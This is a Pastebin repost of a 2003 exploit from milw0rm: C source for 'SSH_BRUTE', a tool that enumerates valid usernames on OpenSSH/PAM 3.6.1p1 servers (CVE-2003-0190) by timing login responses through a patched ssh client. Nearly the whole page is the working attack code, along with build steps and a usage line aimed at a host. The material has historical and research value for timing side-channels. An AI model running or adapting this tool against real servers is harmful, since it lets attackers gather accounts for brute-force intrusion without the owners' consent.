Advertisement
FlyFar

OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool - CVE-2003-0190

Jan 27th, 2024
606
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.82 KB | Cybersecurity | 0 0
  1. /*
  2. * SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
  3. * Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
  4. *
  5. *
  6. * Vulnerability discovered by Marco Ivaldi <raptor@mediaservice.net>
  7. * Proof of concept code by Maurizio Agazzini <inode@mediaservice.net>
  8. *
  9. * Tested against Red Hat, Mandrake, and Debian GNU/Linux.
  10. *
  11. * Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
  12. *
  13. * $ tar xvfz openssh-3.6.1p1.tar.gz
  14. * $ patch -p0 <openssh-3.6.1p1_brute.diff
  15. * patching file openssh-3.6.1p1/ssh.c
  16. * patching file openssh-3.6.1p1/sshconnect.c
  17. * patching file openssh-3.6.1p1/sshconnect1.c
  18. * patching file openssh-3.6.1p1/sshconnect2.c
  19. * $ cd openssh-3.6.1p1
  20. * $ ./configure
  21. * $ make
  22. * $ cc ../ssh_brute.c -o ssh_brute
  23. * $ ./ssh_brute 1 list.txt 192.168.0.66
  24. */
  25.  
  26. #include <stdio.h>
  27. #include <stdlib.h>
  28. #include <sys/wait.h>
  29.  
  30. /* an illegal user */
  31. #define NO_USER "not_val_user"
  32.  
  33. /* path of the patched ssh */
  34. #define PATH_SSH "./ssh"
  35.  
  36. /* max time range for invalid user */
  37. #define TIME_RANGE 3
  38.  
  39. int main(int argc, char *argv[])
  40. {
  41. FILE * in;
  42. char buffer[2000], username[100], *host;
  43. int time_non_valid = 0, time_user = 0;
  44. int version = 1, i = 0, ret;
  45.  
  46. fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
  47. fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n");
  48.  
  49. if (argc < 3) {
  50. fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
  51. exit(-1);
  52. }
  53.  
  54. version = atoi(argv[1]);
  55. host = argv[3];
  56.  
  57. if ( ( in = fopen(argv[2], "r") ) == NULL ) {
  58. fprintf(stderr, "\n Can't open %s\n", argv[2]);
  59. exit(-1);
  60. }
  61.  
  62. /* test an illegal user */
  63. printf("\n Testing an illegal user\t: ");
  64. fflush(stdout);
  65.  
  66. sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);
  67.  
  68. for (i = 0; i < 3; i++) {
  69. ret = system(buffer);
  70. time_non_valid += WEXITSTATUS(ret);
  71. }
  72.  
  73. time_non_valid /= 3;
  74.  
  75. printf("%d second(s)\n\n", time_non_valid);
  76.  
  77. time_non_valid += TIME_RANGE;
  78.  
  79. /* test supplied users */
  80. fscanf(in, "%s", username);
  81.  
  82. while ( !feof(in) ) {
  83.  
  84. printf(" Testing login %s\t", username);
  85.  
  86. if (strlen(username) <= 8)
  87. printf("\t");
  88. printf(": ");
  89.  
  90. fflush( stdout );
  91.  
  92. sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, username, host);
  93. ret = system(buffer);
  94. time_user = WEXITSTATUS(ret);
  95.  
  96. if (time_user <= time_non_valid)
  97. printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user);
  98. else {
  99. /* valid user? test it again to be sure */
  100.  
  101. ret = system(buffer);
  102. time_user = WEXITSTATUS(ret);
  103.  
  104. if (time_user <= time_non_valid)
  105. printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user);
  106. else
  107. printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user);
  108. }
  109.  
  110. fscanf(in, "%s", username);
  111. }
  112.  
  113. fclose(in);
  114.  
  115. printf("\n");
  116.  
  117. exit(0);
  118. }
  119.  
  120.  
  121.  
  122. // milw0rm.com [2003-04-30]
  123.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement